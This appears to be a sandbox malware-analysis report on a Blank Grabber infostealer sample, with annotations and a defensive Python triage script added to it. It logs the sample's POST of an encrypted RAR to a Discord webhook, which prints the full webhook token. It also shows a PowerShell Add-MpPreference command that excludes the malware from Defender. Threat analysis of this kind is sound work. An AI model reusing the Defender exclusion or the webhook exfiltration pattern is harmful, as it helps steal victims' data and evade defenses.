Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 72 65 76 65 72 73 65 22 3a 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 31 38 39 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 22 6d 6f 62 69 6c 65 22 3a 66 61 6c 73 65 2c 22 70 72 6f 78 79 22 3a 66 61 6c 73 65 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 7d
Data Ascii: {"status":"success","country":"United States","regionName":"New York","timezone":"America/New_York","reverse":"static-cpe-8-46-123-189.centurylink.com","mobile":false,"proxy":false,"query":"8.46.123.189"}


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  0192.168.2.749913162.159.137.2324433800C:\Users\user\Desktop\X9g8L63QGs.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2025-01-05 06:19:50 UTC302OUTPOST /api/webhooks/1315377405426270278/HIGwvC-Zpfa8Zkb7aEYPMg-EuYuZPz1LJEfXefQjcA8JYgb6wbSS5zj82QNtaz9Su_0D HTTP/1.1
                                                                                                                                                                                                                                                                  Host: discord.com
                                                                                                                                                                                                                                                                  Accept-Encoding: identity
                                                                                                                                                                                                                                                                  Content-Length: 755602
                                                                                                                                                                                                                                                                  User-Agent: python-urllib3/2.2.3
                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=37a76d34b53131452d6fc832f167ffc7
                                                                                                                                                                                                                                                                  2025-01-05 06:19:50 UTC16384OUTData Raw: 2d 2d 33 37 61 37 36 64 33 34 62 35 33 31 33 31 34 35 32 64 36 66 63 38 33 32 66 31 36 37 66 66 63 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 42 6c 61 6e 6b 2d 66 72 6f 6e 74 64 65 73 6b 2e 72 61 72 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 52 61 72 21 1a 07 01 00 da 7f d0 7b 21 04 00 00 01 0f 97 c7 22 e7 49 45 1e 3c 3d 5c 96 a5 de b5 91 e2 41 43 1e 40 82 b7 23 dd d6 56 8b e2 ca 02 3c 85 ed a2 03 7f 29 49 61 20 a7 ec c2 de 3a 6d f5 06 5e ba b5 b8 73 d0 43 ab 9a 5e 34 f8 46 ab 9b 41 26 63 09 7b 16 73 43 70 8d 98 0d 15 7d 10 a5 20 3f 1d
Data Ascii (decoded from the raw bytes above; note that the report's own ASCII rendering shows the file name as "Blank-user.rar" while the raw bytes read "Blank-frontdesk.rar", so the hex column is the authoritative view): --37a76d34b53131452d6fc832f167ffc7\r\nContent-Disposition: form-data; name="file"; filename="Blank-frontdesk.rar"\r\nContent-Type: application/octet-stream\r\n\r\nRar!\x1a\x07\x01\x00 (RAR5 signature) followed by a RAR5 archive encryption header (da 7f d0 7b 21 04 00 00 01 0f, then a 16-byte salt and a 12-byte password check value) and then ciphertext. The remaining printable characters in the ASCII column are bytes of the encrypted archive that happen to fall in the printable range, not text.
                                                                                                                                                                                                                                                                  2025-01-05 06:19:50 UTC16384OUTData Raw: 83 8d 61 22 02 08 0f f6 08 5e 39 26 70 aa 39 45 c0 b1 8e bc 10 56 e7 85 0d 61 94 c2 1e 32 c0 59 e0 44 93 7d 34 d8 b1 f1 34 ab 06 1d 29 f0 28 7e e4 cc fb b0 06 0f 4c e9 87 99 1a 7c 6b 96 a1 59 18 03 eb 26 f2 9a 61 36 4a 46 c2 de 6e 00 85 a9 18 9c 7a a5 fa 4f 52 f3 84 e8 d6 29 63 05 26 b2 c3 c0 e8 c6 e7 ba ba c7 82 00 6b 7d cb 41 be 64 81 2c f7 eb 47 c0 3a 8e b2 1c c4 f6 66 a6 d9 e6 c8 a6 c6 98 82 1d ea 3e cc 6f 1f f2 6a 6f e2 e1 00 33 1b 5d fb 73 ed 7d b6 5d f2 4e c7 5a 7a ca 48 0a 3c e6 ee 31 59 2b dd 4e ab ca 28 13 71 5a 60 36 ff 2a 24 14 f2 58 9f 82 46 66 1c 56 23 c9 e2 be bb 23 2c 35 c0 48 f7 af a4 c2 d8 d5 b1 ae f2 1c 76 cb 2b f6 98 31 f7 aa 76 48 a1 3a f6 b6 c6 38 89 d1 b2 9d 3d a9 62 63 f4 35 fb e6 d1 c9 c3 99 67 62 0a ba c7 1e e9 6d 4c 7a ae 26 47
                                                                                                                                                                                                                                                                  Data Ascii: a"^9&p9EVa2YD}44)(~L|kY&a6JFnzOR)c&k}Ad,G:f>ojo3]s}]NZzH<1Y+N(qZ`6*$XFfV##,5Hv+1vH:8=bc5gbmLz&G
                                                                                                                                                                                                                                                                  2025-01-05 06:19:50 UTC16384OUTData Raw: ca cb 6a 3b e9 14 24 a1 05 94 26 e6 a3 9f 83 28 75 6d 5f 50 7a e8 22 fc b7 a4 ea 5d 9b 6c fb 6e 7d bb 6a cb 0f 75 13 83 b5 5b f5 df 75 fb 90 47 00 3d c0 04 7f 39 c8 31 5e 45 70 12 e4 d5 a4 7b 0d 50 2d e3 64 d1 a0 fe 91 88 a8 e1 f6 5a 12 89 bf b4 7f db 24 4f 12 20 6c 0f f2 a3 31 1d 79 78 1f 07 2f ab 9a 0f 49 7f 24 c4 41 0e 98 ba 2f 90 4d 6c 9f 4d 28 1b d3 d4 ee c5 1d 9a d3 eb 9a aa fb 11 be a1 9c cb dc c0 ae 25 c2 6d 9b e0 34 83 c0 32 00 22 2c 0a 69 65 18 ca 83 93 7d a8 a0 6e 2f 96 16 41 f9 34 ba 10 67 8f 51 c2 ee 95 84 31 74 5d 82 7e 3a be 3c a3 81 07 fe 5c 4e 63 77 3a d0 fe 7d 11 1f 91 aa 29 99 b9 fe a0 c0 78 29 24 70 8b cc 71 d0 02 c0 bd 39 21 21 90 50 88 f4 9c 35 ad 78 43 45 21 f2 c5 23 96 f5 ae 4a ce 18 50 2a 1f 01 4f a1 73 60 c3 38 0b 1e 62 5f ba bc
                                                                                                                                                                                                                                                                  Data Ascii: j;$&(um_Pz"]ln}ju[uG=91^Ep{P-dZ$O l1yx/I$A/MlM(%m42",ie}n/A4gQ1t]~:<\Ncw:})x)$pq9!!P5xCE!#JP*Os`8b_
                                                                                                                                                                                                                                                                  2025-01-05 06:19:50 UTC16384OUTData Raw: 2d 3c 08 ae e3 08 dd 64 72 82 95 cd cb cd 48 a9 0f 38 c1 1a 48 3b 3d 85 85 d8 c1 8d 34 b7 a4 f6 5c 57 b5 57 a0 24 9b 96 b1 d5 d3 87 48 b7 95 18 20 b2 9d 1d 0c f2 6c d9 38 4a d5 15 e4 56 80 86 5b c9 93 fb de 9f 27 01 f6 70 70 1d 54 e1 2f d0 47 62 24 5c 7e 4c c6 85 13 ac ff 60 8d 7b a9 87 a1 e0 a8 21 91 d2 20 08 6b 1f f6 ad 49 47 6a 8e f0 ba a5 68 06 47 df b7 98 de 41 97 c0 83 1f eb c9 47 57 ef cb df 2e ed 9e 06 f0 0d 92 39 fa ba c6 9f 5e 4f 62 f4 c4 8a f4 3d f8 d4 cb 42 3f 9b 24 98 e6 02 1b 86 13 68 72 aa a0 4f a5 2a 03 e6 40 9a f8 50 4b e9 5f 9e 65 74 e6 92 00 a1 bd 6a 5d d5 4c e8 26 24 f2 12 c7 52 ca b8 5c b7 e3 b9 06 72 f1 ac 0a 73 a7 d8 b4 7e 0f e8 d2 1c f9 a3 0d d9 55 91 81 4b 5b f1 30 e4 6f 01 4e b9 da c2 4d 26 fe 0d fb 54 c0 d7 d5 c1 ec 25 45 2d 90
                                                                                                                                                                                                                                                                  Data Ascii: -<drH8H;=4\WW$H l8JV['ppT/Gb$\~L`{! kIGjhGAGW.9^Ob=B?$hrO*@PK_etj]L&$R\rs~UK[0oNM&T%E-
                                                                                                                                                                                                                                                                  2025-01-05 06:19:50 UTC16384OUTData Raw: 60 94 5d 9e 32 b2 aa e9 69 1d 39 94 67 37 d3 d9 6c 99 36 39 24 8e 99 31 93 0b 72 2f 48 66 1b c8 37 5e 9e a7 4a bf 77 8c e8 7e 86 8c 7b d0 83 ac 99 2d 46 02 33 c1 6f c2 88 ea e8 1e ce 0f 3e 76 2e b3 c2 b2 41 41 db 97 27 d8 03 4f 3e 73 ab d0 63 c3 8e cb 49 c7 4e 4c d8 98 a8 8a b4 ca 61 be 80 67 b8 72 cf a4 24 ea 35 9c 2c 4a 53 7e ab 59 52 13 32 d9 71 ea 5d 76 2a 96 42 6e 34 55 b4 99 ef 2f 65 4e b1 94 8f ba c0 80 74 35 0c 6f 27 44 16 50 bf 7b 67 23 e6 14 b5 d3 75 48 7a cc 46 68 ae ce 6e f7 ea 2a 62 b3 c4 a4 af 72 d0 24 cf a7 74 2c 5e 9a b7 9d 14 92 d8 d9 4e 39 5f 0f 95 42 52 9e e3 ea 59 4e 3b 92 b6 ac f2 27 ee 74 21 35 69 76 3e a3 70 cf 66 0b 07 9d d1 3f aa da 99 d8 64 51 d7 18 53 cc b6 a4 37 04 89 cf 40 19 60 a2 68 c7 40 d0 58 35 04 20 8b 7d 26 f2 3f f7 e6
                                                                                                                                                                                                                                                                  Data Ascii: `]2i9g7l69$1r/Hf7^Jw~{-F3o>v.AA'O>scINLagr$5,JS~YR2q]v*Bn4U/eNt5o'DP{g#uHzFhn*br$t,^N9_BRYN;'t!5iv>pf?dQS7@`h@X5 }&?
                                                                                                                                                                                                                                                                  2025-01-05 06:19:50 UTC16384OUTData Raw: ba fc bf 96 0c da ac 2b 11 cd 4e e3 15 6b cc ea 23 26 2c 8f c2 bb 01 4a e1 13 0a 2e b3 24 48 bb e1 5d d2 d8 c1 77 60 8c 54 8a 7c 5c 01 50 1a 9a 26 a0 36 f9 99 84 4f 98 18 45 8d 87 97 7e 62 9e 00 0a 33 15 05 df 44 e0 05 bb 10 4b 78 c6 b5 e0 0d 1b 80 5e 96 54 44 d2 b3 70 68 4b fb ce 03 42 81 48 a8 85 f3 99 b0 30 7c e4 9f 83 2f 80 a9 a0 d2 b6 1e 3f 80 78 10 8d 5e a0 0a 34 f0 29 b7 b4 a2 e3 5a df 2b 59 fe 42 1e 86 d1 a5 16 65 c8 b7 d6 cd 0e cf 50 35 2c 5a e8 4a e2 ed 4f df 08 01 ec 5d ad 49 b6 fb 05 15 43 ec 86 4a 7d 57 70 31 08 36 65 4f c0 02 7a eb 6c 49 4e 52 9f 15 b3 35 1b 82 63 19 9d b4 ca bf af 88 c9 f7 84 c0 31 e5 84 83 a5 68 27 f5 0e bd 3d 4f 9d b6 09 f9 2d 86 ee 6c a7 b4 8d 81 91 06 19 dd 38 de c8 dc 68 ec 2e 56 5f 7d ce 78 89 49 a6 2f a7 0f 3f e2 92
                                                                                                                                                                                                                                                                  Data Ascii: +Nk#&,J.$H]w`T|\P&6OE~b3DKx^TDphKBH0|/?x^4)Z+YBeP5,ZJO]ICJ}Wp16eOzlINR5c1h'=O-l8h.V_}xI/?
                                                                                                                                                                                                                                                                  2025-01-05 06:19:50 UTC16384OUTData Raw: d7 6a d7 a7 ca 10 be e5 17 71 4f c9 f5 0a 07 23 3f cb d2 e2 5c 87 97 a4 e6 71 32 17 d5 c5 67 83 95 66 eb f9 14 59 0f a9 de 6d 7f f8 b3 1b 08 d2 8e d9 c3 9e 62 3c 67 f6 f9 8f 96 0f 3d 72 fd 6b d7 49 fb ed 64 4c 64 1e f5 8f c6 c0 13 6d 81 c9 ee 2b 5c c2 df cd bb 3d 0b f5 76 80 cd 7a ae cc 87 57 57 93 30 b3 37 b8 59 34 d0 d8 24 59 bb fd 64 ed ed b1 25 d7 ad d1 af ff b3 03 15 23 95 0d aa 88 9a 0f 84 aa 8c 4e 98 7a eb 9b 76 76 4a da a4 a0 6e ba c5 75 35 59 4b 0a 58 27 11 7e 13 bb 13 56 d7 7d 86 28 75 d6 a9 ee 8d e6 5e 20 55 e1 9e 71 3d f5 da 88 43 33 98 11 39 58 68 07 ea 79 67 97 0d 2f 70 11 79 7b 50 6f 90 08 fd 02 6c db 67 0e 2a 91 7c 3e 5c 76 85 6b 5b c2 47 b5 08 92 61 fb 41 eb e2 a9 be bc 71 5e 38 68 78 89 80 75 81 b1 91 c6 61 a5 4a d0 3b 5e 08 48 da 7a 23
                                                                                                                                                                                                                                                                  Data Ascii: jqO#?\q2gfYmb<g=rkIdLdm+\=vzWW07Y4$Yd%#NzvvJnu5YKX'~V}(u^ Uq=C39Xhyg/py{Polg*|>\vk[GaAq^8hxuaJ;^Hz#
                                                                                                                                                                                                                                                                  2025-01-05 06:19:50 UTC16384OUTData Raw: 78 7b 33 81 96 05 43 37 2b 7b 6c f2 e9 fb 0c eb c8 ef 60 0f 4d a1 0c 06 47 08 d2 51 4f d4 47 31 3f 71 bc dd d3 12 eb a6 03 6a 01 bc 6f 84 98 b9 b5 f5 c7 5a a0 08 9e 08 a2 b8 27 fe b7 be e0 cf 8e 4d e7 ba d1 76 e8 39 aa f6 50 24 83 7f 5b 2d 35 d9 c2 c2 ee 47 c4 d9 00 ec 74 81 32 9f c1 5f bd 3c ee aa 97 cd ec da d1 de 0f 2f b3 a9 91 3b 15 0d f8 42 6a c7 ea ee f9 2c 49 f5 49 b3 0d 87 e9 0b 9c 1f 11 49 3f d6 3e ef 06 bd c3 57 98 0e ee ac 78 41 78 d2 d8 66 72 c3 36 0c ee 55 3f d3 27 49 a5 7d 2d a7 1f d1 d5 3f df d4 42 97 2e 0b 4d 12 90 5d ab cd 65 1d dc bd 2e 81 f5 03 35 5c 67 d1 00 4c 2f 19 47 0a 24 f1 b9 9a 7b ef 31 4c f2 40 a0 eb 40 0f 85 04 1b f7 94 c3 3d 74 62 59 cf cc 66 cd ff 8c 3f 4f 3e 74 63 83 40 0a ad 16 69 64 5e 03 a4 8b 87 d2 bb 83 d6 98 5e 3d b7
                                                                                                                                                                                                                                                                  Data Ascii: x{3C7+{l`MGQOG1?qjoZ'Mv9P$[-5Gt2_</;Bj,III?>WxAxfr6U?'I}-?B.M]e.5\gL/G${1L@@=tbYf?O>tc@id^^=
                                                                                                                                                                                                                                                                  2025-01-05 06:19:50 UTC16384OUTData Raw: 3a d0 b4 f0 79 f9 02 85 35 f3 a7 c9 9c 01 34 49 a4 bd 43 fe eb 54 29 c1 39 01 05 35 eb 5e cc 3c aa 0f e8 53 f2 e7 2a c0 a4 f2 75 0b 3b ff c4 24 75 46 35 46 67 12 52 7a f2 b2 17 f3 94 2e 9b 26 9f 2a 74 77 d7 8c dc a7 97 40 3e 79 1a b1 d4 d5 3a 5b d4 e9 d1 39 a6 99 c2 f0 0e 8c 13 bd 9f 08 e1 9e 28 d4 11 eb f9 a1 f0 e4 5e fc aa 54 4f 4a 7e 91 3e ac 0a b2 a3 e9 2d 62 b8 80 a3 a4 dc 3c 27 e5 08 06 ca 8d a4 0c 6f e4 f3 23 36 6f e0 3c 23 90 0b 6b f9 48 44 69 bb 6a 97 e8 8e b0 9b fd 31 58 53 4e d9 56 29 6e ec 87 9f 21 1d 09 a9 5a 1b e6 54 9d 3e e7 8a 7b 11 38 6d 5d 3d 22 ca 39 02 2f 02 7f c4 85 00 ac 6c f9 4d 80 eb 51 0a 6b 27 56 47 ba ca f5 19 e9 00 8e e6 f7 a4 45 46 54 3f 8d 6c cc 61 22 40 3b f0 0e bc a4 bd 83 9e 44 8c 56 31 b4 37 29 76 f6 fa c1 b7 7f c1 08 c6
                                                                                                                                                                                                                                                                  Data Ascii: :y54ICT)95^<S*u;$uF5FgRz.&*tw@>y:[9(^TOJ~>-b<'o#6o<#kHDij1XSNV)n!ZT>{8m]="9/lMQk'VGEFT?la"@;DV17)v
                                                                                                                                                                                                                                                                  2025-01-05 06:19:50 UTC16384OUTData Raw: 8f 77 53 cf 87 3b 4b d8 10 2a ae e0 04 b7 b8 4b 1f ba 19 8f 7a 46 ca bb bf 11 f2 e1 81 5b 3d 2c 08 5c 71 92 85 5d 81 74 0c fd d4 23 5e 59 87 4d 77 29 43 7e 02 4e 46 9f af 29 9e 96 c2 d4 52 40 33 fe 4a 6c e1 b5 86 b2 0a 37 42 2e 1d 92 4f b0 e5 ff e3 8f 13 03 87 d7 32 b9 2e 8f 07 d1 d8 04 d6 8c 8d e1 e3 6d cd 9f 24 6e 1e d2 76 5d 45 17 da 74 45 83 0d 64 71 6c cb f0 21 79 50 ee b2 5e f9 7b b0 d1 c2 a0 84 5c c9 18 d9 d9 d5 82 a8 88 0c 22 5c f9 b1 03 e9 f4 5e c7 d8 6a 06 b6 1b 2b 60 7e 9a da 20 1a 13 70 a6 64 94 52 71 70 b0 1d a4 37 57 3e 83 46 bd 18 2a 64 64 9b 84 63 d1 81 64 a9 fa 8c dc 49 49 8f 7a 7c bc 25 0d 2e be de 5a 03 a8 64 de d7 bb bd 66 1a f9 5b 5d 13 80 ae 4a 57 34 1c 09 8c fa 7d 98 5a de 3a d6 4b 14 7b 8e fd c9 d1 9a 16 5a cb 3e 58 90 f5 a7 14 e5
                                                                                                                                                                                                                                                                  Data Ascii: wS;K*KzF[=,\q]t#^YMw)C~NF)R@3Jl7B.O2.m$nv]EtEdql!yP^{\"\^j+`~ pdRqp7W>F*ddcdIIz|%.Zdf[]JW4}Z:K{Z>X
2025-01-05 06:19:51 UTC | 1257 | IN | HTTP/1.1 404 Not Found (Discord returned 404 for the webhook path, so the 755,602-byte upload was not accepted in this run; the x-ratelimit-* headers below are Discord's rate-limit bucket for the endpoint)
                                                                                                                                                                                                                                                                  Date: Sun, 05 Jan 2025 06:19:51 GMT
                                                                                                                                                                                                                                                                  Content-Type: application/json
                                                                                                                                                                                                                                                                  Content-Length: 45
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  Cache-Control: public, max-age=3600, s-maxage=3600
                                                                                                                                                                                                                                                                  strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                  x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                                                                                                                                                  x-ratelimit-limit: 5
                                                                                                                                                                                                                                                                  x-ratelimit-remaining: 4
                                                                                                                                                                                                                                                                  x-ratelimit-reset: 1736057992
                                                                                                                                                                                                                                                                  x-ratelimit-reset-after: 1
                                                                                                                                                                                                                                                                  via: 1.1 google
                                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hAXIq9XtArVKc%2Ffubs8AT0r1q2NMEWVkjfKCdI6jYKfc1azRAidxd4u3EbEtHoGK3aODxcAqyDIfPtP5tjiUcDJFBrKwLRcktghWLo%2B2qmX%2BB5kfWJsHE43k6je%2F"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                  Set-Cookie: __cfruid=14735b5a48e24b09b557091335c501751a43c2b5-1736057991; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                  Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                                                                                                                                                                  Set-Cookie: _cfuvid=q.0E45z3pGSklbxiFMyXrHfDuxC.4JrCDgahg7Y.Fx0-1736057991326-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                                  CF-RAY: 8fd15bea497fef9d-EWR
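As an added worked example (not part of the Joe Sandbox report and not code from the sample or from Discord), the following Python takes the request line and the first Data Raw chunk shown above and pulls out what a triager wants from this exchange: the multipart boundary and the real file name carried in the part headers, whether the uploaded RAR starts with a RAR5 archive encryption header (which means even the file names are encrypted and the password is needed just to list it), the PBKDF2 work factor stored in that header, and the creation time encoded in the Discord webhook ID (Discord IDs are snowflakes whose upper 42 bits are milliseconds since 2015-01-01 UTC). The hex bytes are copied from the first chunk above and truncated a few bytes into the first encrypted block; the RAR5 field layout follows the public RAR5 archive format description, and the function and variable names are this example's own. The User-Agent python-urllib3/2.2.3 on the request marks a Python HTTP stack, and the 404 reply means the upload was not accepted in this run.

```python
"""Triage of the captured Discord webhook upload shown in this report."""
import re
import struct
import zlib
from datetime import datetime, timezone

# Request line, copied from the HTTPS stream above.
REQUEST_LINE = ("POST /api/webhooks/1315377405426270278/"
                "HIGwvC-Zpfa8Zkb7aEYPMg-EuYuZPz1LJEfXefQjcA8JYgb6wbSS5zj82QNtaz9Su_0D HTTP/1.1")

# Leading bytes of the first "Data Raw" chunk of the POST body, copied from the report
# and truncated a few bytes into the first encrypted RAR5 block header.
BODY = bytes.fromhex("""
2d 2d 33 37 61 37 36 64 33 34 62 35 33 31 33 31 34 35 32 64 36 66 63 38 33 32 66 31 36 37 66 66 63 37 0d 0a
43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65
3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 42 6c 61 6e 6b 2d 66 72 6f 6e 74 64 65 73 6b 2e 72
61 72 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74
2d 73 74 72 65 61 6d 0d 0a 0d 0a 52 61 72 21 1a 07 01 00 da 7f d0 7b 21 04 00 00 01 0f 97 c7 22 e7 49 45 1e
3c 3d 5c 96 a5 de b5 91 e2 41 43 1e 40 82 b7 23 dd d6 56 8b e2 ca 02 3c 85 ed a2 03 7f 29 49 61 20
""")

RAR5_SIGNATURE = b"Rar!\x1a\x07\x01\x00"
HEAD_CRYPT = 4                          # RAR5 block type 4: archive encryption header
DISCORD_EPOCH_MS = 1_420_070_400_000    # 2015-01-01T00:00:00Z, the snowflake epoch


def read_vint(buf, pos):
    """RAR5 variable-length integer: 7 data bits per byte, MSB set means continue."""
    value = shift = 0
    while True:
        b = buf[pos]
        pos += 1
        value |= (b & 0x7F) << shift
        shift += 7
        if not b & 0x80:
            return value, pos


def parse_multipart_prologue(body):
    """Return (boundary, headers of the first part, offset of that part's payload)."""
    if not body.startswith(b"--"):
        raise ValueError("body does not start with a multipart boundary line")
    line_end = body.index(b"\r\n")
    boundary = body[2:line_end].decode("ascii")
    hdr_end = body.index(b"\r\n\r\n", line_end)
    headers = {}
    for line in body[line_end + 2:hdr_end].split(b"\r\n"):
        name, value = line.decode("ascii").split(":", 1)
        headers[name.strip()] = value.strip()
    return boundary, headers, hdr_end + 4


def parse_rar5_leading_header(data):
    """Parse the first block header after the RAR5 signature (None if not RAR5).
    Type 4 means all later headers, file names included, are AES-256 encrypted."""
    if not data.startswith(RAR5_SIGNATURE):
        return None
    crc_stored, = struct.unpack_from("<I", data, len(RAR5_SIGNATURE))
    crc_start = len(RAR5_SIGNATURE) + 4  # CRC32 covers header size field .. header end
    header_size, pos = read_vint(data, crc_start)
    header_end = pos + header_size
    header_type, pos = read_vint(data, pos)
    header_flags, pos = read_vint(data, pos)
    if header_flags & 0x01:              # extra area present
        _extra_size, pos = read_vint(data, pos)
    if header_flags & 0x02:              # data area present
        _data_size, pos = read_vint(data, pos)
    info = {"header_type": header_type,
            "headers_encrypted": header_type == HEAD_CRYPT,
            "header_crc_ok": zlib.crc32(data[crc_start:header_end]) == crc_stored}
    if header_type == HEAD_CRYPT:
        enc_version, pos = read_vint(data, pos)   # 0 = AES-256
        enc_flags, pos = read_vint(data, pos)     # bit 0: password check value present
        kdf_count = data[pos]                     # PBKDF2-HMAC-SHA256 rounds = 2**kdf_count
        salt = data[pos + 1:pos + 17]
        check = data[pos + 17:pos + 29] if enc_flags & 0x01 else b""
        info.update(encryption_version=enc_version, kdf_count=kdf_count,
                    pbkdf2_iterations=1 << kdf_count, salt=salt, check_value=check)
    return info


def webhook_id_from_request_line(request_line):
    m = re.search(r"/api/webhooks/(\d+)/", request_line)
    if not m:
        raise ValueError("not a Discord webhook request line")
    return int(m.group(1))


def snowflake_to_utc(snowflake):
    """Discord snowflakes carry a millisecond timestamp in their upper 42 bits."""
    ms = (snowflake >> 22) + DISCORD_EPOCH_MS
    return datetime.fromtimestamp(ms // 1000, tz=timezone.utc)


def triage(body=BODY, request_line=REQUEST_LINE):
    boundary, headers, offset = parse_multipart_prologue(body)
    webhook_id = webhook_id_from_request_line(request_line)
    return {"boundary": boundary, "part_headers": headers,
            "rar5": parse_rar5_leading_header(body[offset:]),
            "webhook_id": webhook_id,
            "webhook_created_utc": snowflake_to_utc(webhook_id).isoformat()}
```

Calling triage() on the embedded bytes reports boundary 37a76d34b53131452d6fc832f167ffc7, file name Blank-frontdesk.rar, an archive encryption header with KDF count 15 (32768 PBKDF2 rounds) and a password check value, and a webhook created on 2024-12-08. The encryption header is why the archive contents cannot be listed from the capture: only the signature and this one header are in the clear, and the next block begins with ciphertext. The webhook ID and token in the request line are the actionable indicators; the token is what lets anyone post to the webhook, so treat it as a credential when sharing the report.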


Target ID: 4
Start time: 01:19:08
Start date: 05/01/2025
Path: C:\Users\user\Desktop\X9g8L63QGs.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\Desktop\X9g8L63QGs.exe"
Imagebase: 0x7ff7c2660000
File size: 7'849'526 bytes
MD5 hash: 17E85E39754DB87356121C00E17D3096
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000004.00000003.1275666676.000001FB29EE5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000004.00000003.1275666676.000001FB29EE3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: true

Target ID: 7
Start time: 01:19:09
Start date: 05/01/2025
Path: C:\Users\user\Desktop\X9g8L63QGs.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\Desktop\X9g8L63QGs.exe"
Imagebase: 0x7ff7c2660000
File size: 7'849'526 bytes
MD5 hash: 17E85E39754DB87356121C00E17D3096
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000007.00000003.1686994735.000001E7C3B87000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000007.00000003.1689633424.000001E7C39E2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000007.00000002.1709310873.000001E7C39E3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000007.00000002.1694660659.000001E7C2B80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000007.00000003.1689985178.000001E7C39E2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:8
                                                                                                                                                                                                                                                                  Start time:01:19:11
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\X9g8L63QGs.exe'"
                                                                                                                                                                                                                                                                  Imagebase:0x7ff7a7b90000
                                                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:9
                                                                                                                                                                                                                                                                  Start time:01:19:11
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
